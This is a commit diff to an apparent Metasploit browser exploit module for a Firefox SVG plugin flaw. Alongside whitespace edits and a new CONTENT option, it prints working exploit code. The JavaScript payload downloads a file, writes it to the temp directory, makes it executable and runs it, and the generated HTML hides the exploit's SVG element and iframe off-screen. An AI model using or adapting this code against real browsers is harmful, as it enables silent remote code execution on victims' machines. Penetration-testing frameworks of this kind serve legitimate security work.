Whitespace tweaks and minor bug fix. Wrong payloads still run.

Author: jvennix-r7

modules/exploits/multi/browser/firefox_svg_plugin.rb

@@ -71,8 +71,9 @@ def initialize(info = {})
 			'DefaultTarget'  => 0,
 			'Author'         =>
 				[
-					'joev',          # metasploit module
-					'Marius Mlynski' # discovery & bug report
+					'Marius Mlynski', # discovery & bug report
+					'joev'            # metasploit module
+					
 				],
 			'References'     =>
 				[
@@ -83,6 +84,12 @@ def initialize(info = {})
 				],
 			'DisclosureDate' => 'Jan 08 2013'
 		))
+
+		register_options(
+			[
+				OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
+			], Auxiliary::Timed)
+
 	end
 
 	def on_request_uri(cli, request)
@@ -105,7 +112,7 @@ def on_request_uri(cli, request)
 		else
 			# send initial HTML page
 			print_status("Sending #{self.name}")
-			send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
+			send_response_html(cli, generate_html)
 		end
 		handler(cli)
 	end
@@ -153,12 +160,11 @@ def js_payload
 		x.send(null);
 		alert(x.responseText);
 		var file = Components.classes["@mozilla.org/file/directory_service;1"]
-					.getService(Components.interfaces.nsIProperties)
-					.get("TmpD", Components.interfaces.nsIFile);
+		  .getService(Components.interfaces.nsIProperties)
+		  .get("TmpD", Components.interfaces.nsIFile);
 		file.append('#{payload_filename}');
-		
-		var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"].
-						 createInstance(Components.interfaces.nsIFileOutputStream);
+		var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
+		  .createInstance(Components.interfaces.nsIFileOutputStream);
 		stream.init(file, 0x04 \| 0x08 \| 0x20, 0666, 0);
 		stream.write(x.responseText, x.responseText.length);
 		if (stream instanceof Components.interfaces.nsISafeOutputStream) {
@@ -169,7 +175,7 @@ def js_payload
 		#{chmod_code}
 		alert(file.path);
 		var process = Components.classes["@mozilla.org/process/util;1"]
-										.createInstance(Components.interfaces.nsIProcess);
+		                .createInstance(Components.interfaces.nsIProcess);
 		process.init(file);
 		process.run(false,[],0);
 		|
@@ -204,18 +210,18 @@ def generate_html
 			:access_string    => 'access',
 			:frame_ref        => 'frames[0]',
 			:frame_name       => 'n',
-			:loader_path      => "#{base_url}.swf"
+			:loader_path      => "#{base_url}.swf",
+			:content          => self.datastore['CONTENT'] || ''
 		}
 		%Q|
 			<!doctype html>
 			<html>
 			<head>
-				<meta http-equiv="content-type" content="text/html; charset=utf-8">
 				<base href="chrome://browser/content/">
 			</head>
 			<body>
 
-			<svg>
+			<svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
 				<symbol id="#{vars[:symbol_id]}">
 					<foreignObject>
 						<object></object>
@@ -250,7 +256,8 @@ def generate_html
 			</script>
 
 			<iframe style="position:absolute;top:-500px;left:-500px;width:1px;height:1px"
-							name="#{vars[:frame_name]}"></iframe>
+			        name="#{vars[:frame_name]}"></iframe>
+			#{vars[:content]}
 			</body>
 			</html>
 			|